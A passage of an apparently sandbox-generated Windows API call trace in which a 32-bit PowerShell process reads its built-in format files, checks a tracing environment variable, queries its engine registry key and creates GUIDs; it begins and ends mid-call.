lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0076.254] GetLastError () returned 0xcb [0076.255] SetErrorMode (uMode=0x1) returned 0x1 [0076.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.255] GetLastError () returned 0xcb [0076.255] SetErrorMode (uMode=0x1) returned 0x1 [0076.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0076.255] GetLastError () returned 0xcb [0076.255] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.256] GetLastError () returned 0xcb [0076.256] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0076.256] GetLastError () returned 0xcb [0076.256] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.256] GetLastError () returned 0xcb [0076.256] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0076.256] GetLastError () returned 0xcb [0076.256] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.256] GetLastError () returned 0xcb [0076.256] SetErrorMode (uMode=0x1) returned 0x1 [0076.256] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0076.257] GetLastError () returned 0xcb [0076.257] SetErrorMode (uMode=0x1) returned 0x1 [0076.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0076.257] GetLastError () returned 0xcb [0076.257] SetErrorMode (uMode=0x1) returned 0x1 [0076.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0076.257] GetLastError () returned 0xcb [0076.257] SetErrorMode (uMode=0x1) returned 0x1 [0076.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0076.257] GetLastError () returned 0xcb [0076.257] SetErrorMode (uMode=0x1) returned 0x1 [0076.257] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0076.258] GetLastError () returned 0xcb [0076.258] SetErrorMode (uMode=0x1) returned 0x1 [0076.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0076.258] GetLastError () returned 0xcb [0076.258] SetErrorMode (uMode=0x1) returned 0x1 [0076.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0076.258] GetLastError () returned 0xcb [0076.258] SetErrorMode (uMode=0x1) returned 0x1 [0076.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.259] GetLastError () returned 0xcb [0076.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.270] GetLastError () returned 0xcb [0076.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.270] GetLastError () returned 0xcb [0076.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.271] GetLastError () returned 0xcb [0076.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.271] GetLastError () returned 0xcb [0076.271] SetErrorMode (uMode=0x1) returned 0x1 [0076.272] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0076.272] GetLastError () returned 0x0 [0076.272] GetFileType (hFile=0x328) returned 0x1 [0076.272] SetErrorMode (uMode=0x1) returned 0x1 [0076.272] GetFileType (hFile=0x328) returned 0x1 [0076.272] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.274] GetLastError () returned 0x0 [0076.276] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.276] GetLastError () returned 0x0 [0076.276] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.276] GetLastError () returned 0x0 [0076.276] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.276] GetLastError () returned 0x0 [0076.277] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x9e2, lpOverlapped=0x0) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] ReadFile (in: hFile=0x328, lpBuffer=0x2e4db46, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4db46*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] ReadFile (in: hFile=0x328, lpBuffer=0x2e4e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e4e5c4*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] CloseHandle (hObject=0x328) returned 1 [0076.277] GetLastError () returned 0x0 [0076.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.278] GetLastError () returned 0x0 [0076.278] SetErrorMode (uMode=0x1) returned 0x1 [0076.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e5f680 | out: lpFileInformation=0x2e5f680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0076.278] GetLastError () returned 0x0 [0076.278] SetErrorMode (uMode=0x1) returned 0x1 [0076.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.278] GetLastError () returned 0x0 [0076.278] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x328) returned 0x0 [0076.278] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.278] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.279] RegCloseKey (hKey=0x328) returned 0x0 [0076.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.279] GetLastError () returned 0x0 [0076.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.279] GetLastError () returned 0x0 [0076.301] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x26a07ebc, Data2=0xb510, Data3=0x4ff0, Data4=([0]=0xa2, [1]=0x98, [2]=0xbb, [3]=0x2b, [4]=0x82, [5]=0x8a, [6]=0xef, [7]=0x87))) returned 0x0 [0076.318] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xf50366d1, Data2=0xe129, Data3=0x4607, Data4=([0]=0xa3, [1]=0xf7, [2]=0xfe, [3]=0x56, [4]=0x4c, [5]=0x62, [6]=0x60, [7]=0xfb))) returned 0x0 [0076.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.319] GetLastError () returned 0x0 [0076.319] SetErrorMode (uMode=0x1) returned 0x1 [0076.320] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0076.320] GetLastError () returned 0x0 [0076.320] GetFileType (hFile=0x328) returned 0x1 [0076.320] SetErrorMode (uMode=0x1) returned 0x1 [0076.320] GetFileType (hFile=0x328) returned 0x1 [0076.320] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.322] GetLastError () returned 0x0 [0076.322] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.323] GetLastError () returned 0x0 [0076.323] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.323] GetLastError () returned 0x0 [0076.323] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.323] GetLastError () returned 0x0 [0076.324] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.324] GetLastError () returned 0x0 [0076.324] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0xfb2, lpOverlapped=0x0) returned 1 [0076.324] GetLastError () returned 0x0 [0076.325] ReadFile (in: hFile=0x328, lpBuffer=0x2e720ba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e720ba*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.325] GetLastError () returned 0x0 [0076.325] ReadFile (in: hFile=0x328, lpBuffer=0x2e72968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e72968*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.325] GetLastError () returned 0x0 [0076.325] CloseHandle (hObject=0x328) returned 1 [0076.325] GetLastError () returned 0x0 [0076.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.325] GetLastError () returned 0x0 [0076.325] SetErrorMode (uMode=0x1) returned 0x1 [0076.325] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e931f8 | out: lpFileInformation=0x2e931f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0076.325] GetLastError () returned 0x0 [0076.325] SetErrorMode (uMode=0x1) returned 0x1 [0076.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.325] GetLastError () returned 0x0 [0076.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x328) returned 0x0 [0076.326] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.326] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.326] RegCloseKey (hKey=0x328) returned 0x0 [0076.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.326] GetLastError () returned 0x0 [0076.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.326] GetLastError () returned 0x0 [0076.328] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xaebd9f4e, Data2=0xd4ea, Data3=0x49d8, Data4=([0]=0xb7, [1]=0xab, [2]=0x99, [3]=0xc0, [4]=0xcc, [5]=0xae, [6]=0xb9, [7]=0xea))) returned 0x0 [0076.340] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8bfc1fe3, Data2=0x9d69, Data3=0x4d04, Data4=([0]=0x82, [1]=0x14, [2]=0xa, [3]=0xbf, [4]=0xd3, [5]=0x9f, [6]=0x8d, [7]=0x50))) returned 0x0 [0076.343] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xa1b07c3d, Data2=0xeaf7, Data3=0x45c3, Data4=([0]=0xaf, [1]=0x93, [2]=0x11, [3]=0xb4, [4]=0xfc, [5]=0xba, [6]=0x29, [7]=0xe6))) returned 0x0 [0076.354] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xfb24879a, Data2=0xfe1c, Data3=0x4c5c, Data4=([0]=0x9a, [1]=0x2a, [2]=0x7b, [3]=0xd5, [4]=0x57, [5]=0x72, [6]=0xd0, [7]=0x60))) returned 0x0 [0076.354] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x33ec4d67, Data2=0xe100, Data3=0x477a, Data4=([0]=0xb4, [1]=0xbc, [2]=0x2f, [3]=0xe9, [4]=0xf7, [5]=0xbe, [6]=0x6a, [7]=0x9b))) returned 0x0 [0076.354] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xbdd6d2ff, Data2=0x82bf, Data3=0x42b8, Data4=([0]=0xba, [1]=0x96, [2]=0xd6, [3]=0x2e, [4]=0xec, [5]=0xe7, [6]=0x87, [7]=0xb6))) returned 0x0 [0076.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.354] GetLastError () returned 0x0 [0076.354] SetErrorMode (uMode=0x1) returned 0x1 [0076.354] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0076.355] GetLastError () returned 0x0 [0076.355] GetFileType (hFile=0x328) returned 0x1 [0076.355] SetErrorMode (uMode=0x1) returned 0x1 [0076.355] GetFileType (hFile=0x328) returned 0x1 [0076.355] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.357] GetLastError () returned 0x0 [0076.358] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2eb2ba0*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.358] GetLastError () returned 0x0 [0076.358] ReadFile (in: hFile=0x328, lpBuffer=0x2eb2ba0, nNumberOfBytesToRead=0x1000, 